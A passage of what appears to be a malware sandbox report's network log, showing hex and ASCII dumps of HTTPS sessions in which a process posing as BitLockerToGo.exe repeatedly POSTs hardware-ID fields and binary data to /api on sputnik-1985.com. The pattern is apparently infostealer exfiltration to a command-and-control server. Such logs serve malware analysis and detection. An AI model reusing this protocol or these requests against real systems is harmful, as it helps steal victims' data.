                                                                                                                                                                                                          Data Ascii: KVcIu2Snl9s2ORToimoK6BXkRf8+dUee0VGE2wFbNh0Aamm2CE+Lt05RHJC7dlf0bNhF7icoSr/YaYy2PCYynQhaZeocKpviSgggtKJrFtBo3F36P1xnks192PsZcwYdfH5Vtihzs7dORTCcp3J30XHdWdJeFSa+bX3Qyw0eOvRIK1HfKHOqnhNtALyfZlvsfMR1hj9cX4r1IYjDBW8+VWBucbYMQ7+LbnwhkZN2FtER5N36EyRv4uBp7e9YRy4
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 33 65 61 31 0d 0a 53 77 6f 6c 56 41 39 70 78 78 41 4b 6d 34 4e 44 62 45 47 6f 71 31 35 62 34 47 7a 41 58 63 49 2f 50 48 2b 43 79 55 6d 77 31 77 6c 44 48 6a 31 51 59 6b 57 47 46 48 4f 37 6b 30 4a 35 46 4b 57 53 55 33 66 4d 45 65 55 34 7a 71 73 73 53 2f 71 6b 59 55 54 62 42 58 38 75 52 45 67 72 55 64 38 6f 63 36 71 65 45 32 30 49 74 49 39 36 51 2f 68 38 39 45 6e 36 41 7a 42 6a 6d 71 6c 42 6f 4f 39 31 63 78 6f 4a 63 47 5a 39 68 69 68 72 6e 36 64 61 51 43 47 52 6b 33 59 57 30 52 48 6b 35 66 70 2f 58 47 2b 53 70 47 46 45 32 77 56 2f 4c 6b 52 49 4b 31 48 66 4b 48 4f 71 6e 68 4e 74 44 4c 43 6a 57 6e 66 49 4f 4e 78 6c 68 68 64 63 56 34 62 78 57 61 6a 7a 43 58 73 6d 56 56 68 57 49 62 34 38 63 36 4f 72 4f 6e 67 68 6b 5a 4e 32 46 74 45 52 35 4c 45 65 49 31 51 44 6f
                                                                                                                                                                                                          Data Ascii: 3ea1SwolVA9pxxAKm4NDbEGoq15b4GzAXcI/PH+CyUmw1wlDHj1QYkWGFHO7k0J5FKWSU3fMEeU4zqssS/qkYUTbBX8uREgrUd8oc6qeE20ItI96Q/h89En6AzBjmqlBoO91cxoJcGZ9hihrn6daQCGRk3YW0RHk5fp/XG+SpGFE2wV/LkRIK1HfKHOqnhNtDLCjWnfIONxlhhdcV4bxWajzCXsmVVhWIb48c6OrOnghkZN2FtER5LEeI1QDo
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 58 4d 51 4d 76 48 48 46 57 55 61 49 70 62 76 76 48 4d 6a 45 38 31 61 73 50 64 38 78 42 35 54 6a 4f 46 31 78 54 68 76 46 42 68 4d 63 4e 62 7a 49 4a 41 48 5a 78 70 68 68 50 6a 36 4e 71 65 52 53 30 76 32 59 2f 6d 48 7a 30 59 66 38 2b 4c 55 65 69 67 47 6a 78 31 36 6b 62 50 6c 31 51 57 32 6e 48 45 41 71 62 67 30 4e 73 51 61 69 54 55 6b 66 38 62 4d 68 31 33 69 38 55 63 35 4c 5a 55 62 54 6e 48 58 63 75 56 58 78 43 53 5a 49 4d 65 36 75 72 66 69 55 73 72 5a 4a 54 64 38 77 52 35 54 6a 4f 6f 39 69 62 4d 2b 45 55 71 4c 49 39 57 77 4d 63 4b 56 5a 74 6d 6a 52 58 69 39 64 4b 4a 52 69 30 6b 33 4a 58 38 47 7a 55 59 66 5a 33 4e 45 4f 2b 32 56 57 77 38 79 31 44 49 67 31 34 53 32 69 44 4b 48 50 36 6e 68 4e 74 67 4b 54 37 41 33 39 6f 58 4f 52 46 6a 6d 64 35 52 38 50 5a 44 4a
                                                                                                                                                                                                          Data Ascii: XMQMvHHFWUaIpbvvHMjE81asPd8xB5TjOF1xThvFBhMcNbzIJAHZxphhPj6NqeRS0v2Y/mHz0Yf8+LUeigGjx16kbPl1QW2nHEAqbg0NsQaiTUkf8bMh13i8Uc5LZUbTnHXcuVXxCSZIMe6urfiUsrZJTd8wR5TjOo9ibM+EUqLI9WwMcKVZtmjRXi9dKJRi0k3JX8GzUYfZ3NEO+2VWw8y1DIg14S2iDKHP6nhNtgKT7A39oXORFjmd5R8PZDJ
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 54 79 55 74 56 6e 57 4c 4b 51 36 62 71 7a 70 70 4e 4f 43 44 56 6c 75 59 58 50 78 5a 32 6e 63 49 64 35 62 64 5a 62 44 6a 4d 57 64 36 48 58 78 57 49 66 49 77 51 36 4b 65 53 32 30 38 79 5a 49 4c 64 78 51 73 79 56 6d 7a 42 33 46 48 6f 74 42 6f 38 64 63 78 62 77 59 6c 41 45 5a 78 6c 69 52 58 75 34 74 53 66 51 69 63 72 30 5a 66 39 46 44 6b 5a 64 6f 66 4f 46 2b 47 35 58 47 67 34 6a 78 2b 4d 67 45 70 56 77 69 36 74 41 65 76 68 79 34 70 39 4c 53 53 4c 33 65 74 53 49 46 5a 30 67 34 56 4a 72 37 56 57 62 6a 6a 4b 56 63 53 41 55 52 53 57 61 6f 63 57 34 75 37 59 6e 6c 6f 34 49 74 53 64 2b 78 49 32 47 6d 47 42 77 42 48 6a 2b 42 51 6b 4d 74 63 52 6c 4d 64 6a 41 70 6f 75 6c 56 58 2f 70 39 75 58 43 48 4a 6b 31 5a 44 6d 45 44 59 57 63 6f 7a 42 47 75 69 2b 58 47 55 32 79 6c
                                                                                                                                                                                                          Data Ascii: TyUtVnWLKQ6bqzppNOCDVluYXPxZ2ncId5bdZbDjMWd6HXxWIfIwQ6KeS208yZILdxQsyVmzB3FHotBo8dcxbwYlAEZxliRXu4tSfQicr0Zf9FDkZdofOF+G5XGg4jx+MgEpVwi6tAevhy4p9LSSL3etSIFZ0g4VJr7VWbjjKVcSAURSWaocW4u7Ynlo4ItSd+xI2GmGBwBHj+BQkMtcRlMdjApoulVX/p9uXCHJk1ZDmEDYWcozBGui+XGU2yl
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 56 63 49 75 67 52 50 70 39 64 6d 53 51 43 34 74 32 70 6e 2b 45 54 34 57 64 6f 4c 41 46 65 47 38 58 57 51 35 77 46 62 45 69 46 59 56 6c 53 37 45 57 2b 48 2f 6e 4d 4d 49 43 69 2f 4d 76 50 6f 58 4b 31 5a 73 77 64 78 52 36 4c 51 61 50 48 58 42 57 4d 32 50 58 42 6d 53 61 70 67 62 37 65 37 54 6d 6b 63 71 4a 39 75 58 2f 41 34 2f 46 6e 69 48 77 68 6e 72 74 6b 68 6c 4f 6f 38 66 6a 49 42 4b 56 63 49 75 75 77 33 68 34 4e 50 5a 59 53 30 2f 32 35 66 33 46 7a 56 57 62 4d 48 63 55 65 69 30 47 6a 78 31 77 6c 33 42 67 30 41 5a 6d 6d 36 44 48 4f 7a 31 30 35 52 46 4b 53 54 66 6a 2f 55 4f 4e 68 31 32 6a 4d 45 65 34 4c 52 53 62 6e 57 42 45 63 75 66 45 6b 33 61 51 6f 6b 4b 37 4b 58 37 67 56 34 74 4b 4d 75 57 2b 52 42 35 43 54 32 57 68 52 62 6a 2b 41 49 6b 4e 63 35 63 33 6f 4a
                                                                                                                                                                                                          Data Ascii: VcIugRPp9dmSQC4t2pn+ET4WdoLAFeG8XWQ5wFbEiFYVlS7EW+H/nMMICi/MvPoXK1ZswdxR6LQaPHXBWM2PXBmSapgb7e7TmkcqJ9uX/A4/FniHwhnrtkhlOo8fjIBKVcIuuw3h4NPZYS0/25f3FzVWbMHcUei0Gjx1wl3Bg0AZmm6DHOz105RFKSTfj/UONh12jMEe4LRSbnWBEcufEk3aQokK7KX7gV4tKMuW+RB5CT2WhRbj+AIkNc5c3oJ
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 4d 6f 4b 34 66 61 63 77 31 34 36 4d 39 32 43 75 67 56 35 45 58 2f 50 6e 56 48 6b 74 31 52 70 50 73 74 59 79 59 39 52 45 4a 39 6b 68 68 66 6e 37 39 57 52 54 53 38 69 30 4a 37 36 45 7a 67 61 64 34 62 4c 47 4b 2f 32 47 6d 4d 74 6a 77 6d 4d 73 55 49 53 67 6d 4f 61 57 64 54 6b 7a 59 70 64 4a 7a 54 63 33 39 73 66 4e 52 56 32 69 4e 56 52 38 50 5a 44 4a 44 4c 44 45 5a 54 48 55 68 47 57 62 59 30 56 36 65 72 54 6e 45 4d 6c 4c 74 53 50 2b 78 6b 78 47 6e 75 43 31 78 76 6c 71 6c 4e 74 4f 4d 46 5a 33 6f 51 53 57 39 70 70 6b 6c 75 2b 70 2b 36 52 53 79 59 79 31 35 4b 30 41 33 63 50 4d 34 6a 4a 55 62 66 34 53 48 59 31 78 46 48 4c 69 55 41 55 6b 6d 47 41 47 2b 44 73 31 70 68 42 4c 69 72 54 6d 2f 55 52 4f 42 64 7a 69 73 55 59 2f 62 55 61 4b 6e 58 49 53 59 7a 66 45 69 4b 57
                                                                                                                                                                                                          Data Ascii: MoK4facw146M92CugV5EX/PnVHkt1RpPstYyY9REJ9khhfn79WRTS8i0J76Ezgad4bLGK/2GmMtjwmMsUISgmOaWdTkzYpdJzTc39sfNRV2iNVR8PZDJDLDEZTHUhGWbY0V6erTnEMlLtSP+xkxGnuC1xvlqlNtOMFZ3oQSW9ppklu+p+6RSyYy15K0A3cPM4jJUbf4SHY1xFHLiUAUkmGAG+Ds1phBLirTm/UROBdzisUY/bUaKnXISYzfEiKW
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 36 33 6b 74 74 4d 4f 32 53 43 7a 61 5a 48 62 45 55 6b 33 35 63 4f 6f 61 45 61 63 6e 57 58 41 34 4c 48 51 46 58 43 4c 73 30 59 39 50 58 61 6d 46 34 70 59 2b 53 6a 31 42 63 31 46 58 2b 4f 77 6c 47 68 2b 46 55 6b 62 66 59 52 7a 35 56 41 57 6f 74 34 68 77 76 68 71 39 53 4b 52 53 5a 6b 6c 4e 32 34 47 44 49 61 64 6f 6a 56 58 76 32 6f 55 57 67 6a 67 31 58 65 78 78 78 56 69 32 57 46 43 65 6a 67 6b 34 70 65 4a 7a 54 5a 6d 50 4e 51 4d 51 64 2b 67 34 56 66 72 36 31 52 61 44 50 43 52 49 4f 57 52 42 61 4d 61 63 59 54 39 2b 72 51 32 33 64 6b 5a 4d 4c 64 72 46 77 4d 46 58 32 42 77 67 66 2b 39 58 70 76 4f 63 78 64 7a 59 41 53 57 39 70 6f 79 6b 4f 31 71 5a 79 66 57 57 70 38 69 73 2b 76 53 57 70 42 49 39 33 61 58 2f 62 34 54 43 52 74 6e 52 2b 4d 6c 52 4a 4e 32 69 6d 4a 43
                                                                                                                                                                                                          Data Ascii: 63kttMO2SCzaZHbEUk35cOoaEacnWXA4LHQFXCLs0Y9PXamF4pY+Sj1Bc1FX+OwlGh+FUkbfYRz5VAWot4hwvhq9SKRSZklN24GDIadojVXv2oUWgjg1XexxxVi2WFCejgk4peJzTZmPNQMQd+g4Vfr61RaDPCRIOWRBaMacYT9+rQ23dkZMLdrFwMFX2Bwgf+9XpvOcxdzYASW9poykO1qZyfWWp8is+vSWpBI93aX/b4TCRtnR+MlRJN2imJC
                                                                                                                                                                                                          2025-01-07 05:01:56 UTC1369INData Raw: 56 53 7a 67 32 33 4a 37 69 48 33 34 6f 54 61 72 49 48 4f 71 32 58 56 6f 4c 37 6c 76 63 69 6c 30 53 70 46 43 39 43 75 48 33 6e 72 31 4c 50 43 65 61 30 37 51 45 65 55 34 7a 72 73 38 42 34 72 64 64 4a 48 75 50 56 59 7a 66 45 6a 43 58 59 34 38 56 34 61 58 39 6b 56 67 6e 4b 39 33 64 75 6c 77 31 56 69 76 50 78 42 76 2f 74 56 56 6a 65 63 68 4c 79 38 63 63 56 5a 51 75 30 6c 76 6e 37 63 79 57 52 79 31 6f 33 4a 50 36 58 43 5a 59 61 73 2f 54 55 62 66 72 46 43 51 6e 6a 77 6d 4d 77 46 77 59 6d 32 32 45 47 50 54 31 32 70 68 65 4b 57 50 6b 6f 39 45 52 4e 42 4e 39 69 50 73 76 7a 72 4a 4b 61 54 72 49 45 2b 79 41 52 42 61 6b 55 4c 30 4b 34 66 65 65 76 55 73 38 4a 35 72 54 74 41 52 35 54 6a 4f 75 7a 77 48 69 74 31 30 6d 46 63 68 48 7a 38 63 63 56 5a 34 75 30 6c 76 44 36 74
                                                                                                                                                                                                          Data Ascii: VSzg23J7iH34oTarIHOq2XVoL7lvcil0SpFC9CuH3nr1LPCea07QEeU4zrs8B4rddJHuPVYzfEjCXY48V4aX9kVgnK93dulw1VivPxBv/tVVjechLy8ccVZQu0lvn7cyWRy1o3JP6XCZYas/TUbfrFCQnjwmMwFwYm22EGPT12pheKWPko9ERNBN9iPsvzrJKaTrIE+yARBakUL0K4feevUs8J5rTtAR5TjOuzwHit10mFchHz8ccVZ4u0lvD6t


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          3192.168.2.1249717104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:01:57 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=U8EC1VY5VE892AI389
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 12844
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:01:57 UTC12844OUTData Raw: 2d 2d 55 38 45 43 31 56 59 35 56 45 38 39 32 41 49 33 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 55 38 45 43 31 56 59 35 56 45 38 39 32 41 49 33 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 38 45 43 31 56 59 35 56 45 38 39 32 41 49 33 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37
                                                                                                                                                                                                          Data Ascii: --U8EC1VY5VE892AI389Content-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--U8EC1VY5VE892AI389Content-Disposition: form-data; name="pid"2--U8EC1VY5VE892AI389Content-Disposition: form-data; name="lid"HpOoIh--2a727
                                                                                                                                                                                                          2025-01-07 05:01:58 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:01:58 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=7uasdpsb7fsv8gf2ak9qhk9al6; expires=Fri, 02 May 2025 22:48:36 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2FOPiCAWNKtChG80MZUnAIfAYr9CHkFfy%2BKgehzRSNvVcsiWW2jFHBNKaaCw5NjKAxGUbfBkapWVPYHZGo2MqxD%2BtVZTYkZvx5a%2FxgcmYSCCtF99O2jr%2F9tl2C6ZMQncwol8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe16492cdc3727b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1901&min_rtt=1897&rtt_var=720&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13784&delivery_rate=1511387&cwnd=234&unsent_bytes=0&cid=fd4dc95d4a855ab6&ts=580&x=0"
                                                                                                                                                                                                          2025-01-07 05:01:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                          2025-01-07 05:01:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          4192.168.2.1249718104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:01:58 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=NR6WZU599JG4CJFS1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 15073
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:01:58 UTC15073OUTData Raw: 2d 2d 4e 52 36 57 5a 55 35 39 39 4a 47 34 43 4a 46 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4e 52 36 57 5a 55 35 39 39 4a 47 34 43 4a 46 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 52 36 57 5a 55 35 39 39 4a 47 34 43 4a 46 53 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                          Data Ascii: --NR6WZU599JG4CJFS1Content-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--NR6WZU599JG4CJFS1Content-Disposition: form-data; name="pid"2--NR6WZU599JG4CJFS1Content-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                          2025-01-07 05:01:59 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:01:59 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=pq1ejlgi7386euksdd6bg1v0gh; expires=Fri, 02 May 2025 22:48:38 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYqDrTFunqpIk8eCTgnEZVlZCijeAy4badMjpIv%2Bx38dfyOZxpQ95G2tuf06uqGkgZqM%2FF9bb2YycZBArFzVFhoZ24ciQCX0RWgp4V83JZT%2F8kVZMudjmC3BD1FNC08dcZH6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe1649ace13729f-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1974&min_rtt=1967&rtt_var=752&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16012&delivery_rate=1441263&cwnd=169&unsent_bytes=0&cid=5f341bc51cb1c459&ts=493&x=0"
                                                                                                                                                                                                          2025-01-07 05:01:59 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                          2025-01-07 05:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          5192.168.2.1249719104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=L84VY24J9K91LVK0A
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 20248
                                                                                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC15331OUTData Raw: 2d 2d 4c 38 34 56 59 32 34 4a 39 4b 39 31 4c 56 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 36 43 41 34 32 39 39 30 42 46 44 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4c 38 34 56 59 32 34 4a 39 4b 39 31 4c 56 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 38 34 56 59 32 34 4a 39 4b 39 31 4c 56 4b 30 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                          Data Ascii: --L84VY24J9K91LVK0AContent-Disposition: form-data; name="hwid"8A6CA42990BFD5D420A4C476FD51BCB1--L84VY24J9K91LVK0AContent-Disposition: form-data; name="pid"3--L84VY24J9K91LVK0AContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC4917OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 46 a2 c3 62 df 0f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 6e 38 3a 2c f6 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 83 cf c7 92 c1 ab b1 e0 d5 e0 97 82 ff 63 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 bb 2f f9 58 bc 52 2d ce 14 cb 93 d3 d5 c2 54 a1 3c 75 7d 72 aa d2 28 d7 13 a3 c9 f1 0d 29 b5 c6 dc 07 c2 42 7b df 7e fd 0f 26 8f 27 ba d4 32 59 99 9e ac bd d2 c8 55 0b b5 e4 3d 23 51 c6 c5 3e 1c 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: Fb}n8:,0c</XR-T<u}r()B{~&'2YU=#Q>|
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Tue, 07 Jan 2025 05:02:00 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: PHPSESSID=3e2c0rk2eat5245q1otd4lre5r; expires=Fri, 02 May 2025 22:48:39 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          vary: accept-encoding
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QaIQSBksgfF8Pwo6%2BXN8FexVUzaGt2doxtFO0e1dOvJXxn9Xc7uBkPu8sVYAoOavxBcTLTni2CV56euWIlH5PWZLDKjlhan%2Bgb55u0tcn2A9KbwmHiVOSgCCWWZsPa1MQzd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8fe164a2993d424b-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1560&rtt_var=589&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21209&delivery_rate=1851616&cwnd=248&unsent_bytes=0&cid=664eab85e4327ecb&ts=512&x=0"
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                          2025-01-07 05:02:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          6192.168.2.1249720104.21.112.14436484C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2025-01-07 05:02:02 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=IWA9NYINFDT
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                          Content-Length: 1184
                                                                                                                                                                                                          Host: sputnik-1985.com
